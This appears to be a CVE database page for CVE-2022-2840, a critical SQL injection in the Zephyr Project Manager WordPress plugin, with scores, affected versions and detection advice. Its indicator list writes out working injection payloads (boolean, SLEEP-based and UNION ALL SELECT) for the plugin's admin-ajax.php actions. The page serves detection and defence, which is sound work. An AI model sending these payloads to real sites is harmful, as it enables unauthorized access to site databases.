cbcvebase.
CVE-2022-2840
published 2022-09-19

CVE-2022-2840: The Zephyr Project Manager WordPress plugin before 3.2.5 does not sanitise and escape various parameters before using them in SQL statements via various AJAX…

PriorityP268critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
9.68%
94.9th percentile
The Zephyr Project Manager WordPress plugin before 3.2.5 does not sanitise and escape various parameters before using them in SQL statements via various AJAX actions available to both unauthenticated and authenticated users, leading to SQL injections

Affected

1 ranges
VendorProductVersion rangeFixed in
zephyr-onezephyr_project_manager< 3.2.53.2.5

Detection & IOCsextracted from sources · hover to see the quote

url/wp-admin/admin-ajax.php
commandaction=zpm_view_project&project_id=1 AND 4923=4923&zpm_nonce=22858bf3a7
commandaction=zpm_view_project&project_id=1 OR (SELECT 7464 FROM (SELECT(SLEEP(20)))EtZW)&zpm_nonce=22858bf3a7
commandaction=zpm_view_project&project_id=-4909 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x71707a7071,0x6264514e6e4944795a6f6e4a786a6e4d4f666255434d6a5553526e43616e52576c75774743434f67,0x71786b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&zpm_nonce=22858bf3a7
commandtask_id=1 AND (SELECT 5365 FROM (SELECT(SLEEP(20)))AdIX)&action=zpm_view_task&zpm_nonce=22858bf3a7
commandtask_project=1 AND (SELECT 3078 FROM (SELECT(SLEEP(20)))VQSp)&...&action=zpm_new_task&zpm_nonce=22858bf3a7
bytes
0x71707a7071 / 0x71786b6a71 (UNION SQLi delimiter bytes: qpzpq / qxkjq)
  • Monitor POST requests to /wp-admin/admin-ajax.php containing AJAX actions zpm_view_project, zpm_view_task, or zpm_new_task with SQL injection patterns (SLEEP, UNION ALL SELECT, AND/OR boolean clauses) in the project_id, task_id, or task_project parameters.
  • Detect time-based blind SQLi attempts via SLEEP(20) payloads in POST body parameters targeting the Zephyr Project Manager plugin endpoints; a 20-second response delay is a strong indicator.
  • Detect UNION-based SQLi by looking for the hex-encoded delimiter strings 0x71707a7071 (qpzpq) and 0x71786b6a71 (qxkjq) in HTTP POST bodies to admin-ajax.php, which are sqlmap-generated output markers.
  • Flag requests where the Referer header references zephyr_project_manager_projects or zephyr_project_manager_tasks page parameters alongside SQL metacharacters in POST body fields.
  • The vulnerability is exploitable by both unauthenticated and authenticated users via AJAX actions; monitor for SQLi patterns in admin-ajax.php even without a valid WordPress session cookie.
  • ·The exploit targets plugin version 3.2.42 specifically; the NVD advisory states all versions before 3.2.5 are affected — note the version numbering discrepancy between the PoC (3.2.42) and the patch boundary (3.2.5) should be verified against the actual plugin changelog.
  • ·The nonce value (zpm_nonce=22858bf3a7) used in the PoC is session-specific and will differ per target; detection rules should not rely on a static nonce value.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.